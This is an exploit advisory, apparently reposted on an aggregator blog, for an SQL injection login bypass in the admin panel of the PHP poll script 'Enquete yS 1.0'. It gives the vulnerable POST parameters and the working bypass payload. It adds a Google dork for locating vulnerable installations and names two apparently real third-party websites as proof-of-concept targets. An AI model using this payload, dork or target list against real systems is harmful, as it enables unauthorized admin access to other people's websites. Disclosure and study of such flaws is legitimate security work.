Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Enquete yS 1.0 SQLi Vulnerability

$
0
0
# Enquete yS - Full v. 1.0 POST SQL Injection in Panel Admin
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 08/05/2014
# Vendor Homepage: http://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr
# Version: v1.0
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intitle:ys :: Painel
# Url vul : http://host/patch/enquete/admin/
# Exploit:
         Post in parameters txtUsuario & txtSENHA
                 Post exploit = txtUsuario='-&txtSenha='-&btnLogar=Logar+no+sistema+>>
            Username = '- and Password = '-

# PoC : http://www.sercoladm.com.br/adm/enquete/admin/
        http://www.sgnet-rs.com.br/scripts/enquete/admin/



//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information

Viewing all articles
Browse latest Browse all 8064

Trending Articles